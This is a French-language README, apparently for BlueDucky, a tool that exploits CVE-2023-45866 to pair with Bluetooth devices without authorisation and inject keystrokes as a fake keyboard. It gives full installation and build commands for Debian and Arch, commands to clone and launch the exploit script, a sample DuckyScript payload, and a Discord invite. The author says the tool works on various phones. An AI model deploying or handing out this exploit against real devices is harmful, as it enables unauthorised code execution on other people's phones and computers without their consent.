
BlueDucky exploite une vulnérabilité Bluetooth, spécifiquement CVE-2023-45866, qui permet à un attaquant d'injecter des frappes clavier dans un appareil cible. L'appareil de l'attaquant se fait passer pour un clavier Bluetooth afin d'établir une connexion cryptée sans autorisation de l'utilisateur. L'outil BlueDucky automatise ce processus.
Merci à tous les gens de HackNexus. N'oubliez pas de nous rejoindre en vocal ! https://discord.gg/HackNexus
REMARQUES : Je ne pourrai pas exécuter cela sur un ordinateur portable ou un autre appareil autre qu'un Raspberry Pi pour les tests. De ce fait, tout problème que vous rencontrez devra être résolu entre vous, car je n'ai pas les fonds nécessaires pour acheter un adaptateur.
🚨 CVE-2023-45866 - Implémentation BlueDucky (Utilisation de DuckyScript)
🔓 Appairage non authentifié menant à l'exécution de code (Utilisation du clavier HID)
Ceci est une implémentation de la CVE découverte par marcnewlin
BlueDucky est un outil puissant pour exploiter une vulnérabilité dans les appareils Bluetooth. En exécutant ce script, vous pouvez :
J'ai exécuté ce script avec succès sur un Raspberry Pi 4 en utilisant le module Bluetooth par défaut. Il fonctionne sur divers téléphones, avec une exception intéressante pour une marque néo-zélandaise, Vodafone.
# update apt
sudo apt-get update
sudo apt-get -y upgrade
# install dependencies from apt
sudo apt install -y bluez-tools bluez-hcidump libbluetooth-dev \
git gcc python3-pip python3-setuptools \
python3-pydbus
# install pybluez from source
git clone https://github.com/pybluez/pybluez.git
cd pybluez
sudo python3 setup.py install
# build bdaddr from the bluez source
cd ~/
git clone --depth=1 https://github.com/bluez/bluez.git
gcc -o bdaddr ~/bluez/tools/bdaddr.c ~/bluez/src/oui.c -I ~/bluez -lbluetooth
sudo cp bdaddr /usr/local/bin/
# update pacman & packages
sudo pacman -Syyu
# install dependencies
# since arch doesn't separate lib packages: libbluetooth-dev included in bluez package
sudo pacman -S bluez-tools bluez-utils bluez-deprecated-tools \
python-setuptools python-pydbus python-dbus
git gcc python-pip \
# install pybluez from source
git clone https://github.com/pybluez/pybluez.git
cd pybluez
sudo python3 setup.py install
# build bdaddr from the bluez source
cd ~/
git clone --depth=1 https://github.com/bluez/bluez.git
gcc -o bdaddr ~/bluez/tools/bdaddr.c ~/bluez/src/oui.c -I ~/bluez -lbluetooth
sudo cp bdaddr /usr/local/bin/
git clone https://github.com/pentestfunctions/BlueDucky.git
cd BlueDucky
sudo hciconfig hci0 up
python3 BlueDucky.py
alternativement,
pip3 install -r requirements.txt
🚧 Travail en cours :
REM Title of the payload
STRING ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890!@#$%^&*()_-=+\|[{]};:'",<.>/?
GUI D
REM Opens a private browser to hackertyper.net
DELAY 200
ESCAPE
GUI d
ALT ESCAPE
GUI b
DELAY 700
REM PRIVATE_BROWSER is equal to CTRL + SHIFT + N
PRIVATE_BROWSER
DELAY 700
CTRL l
DELAY 300
STRING hackertyper.net
DELAY 300
ENTER
DELAY 300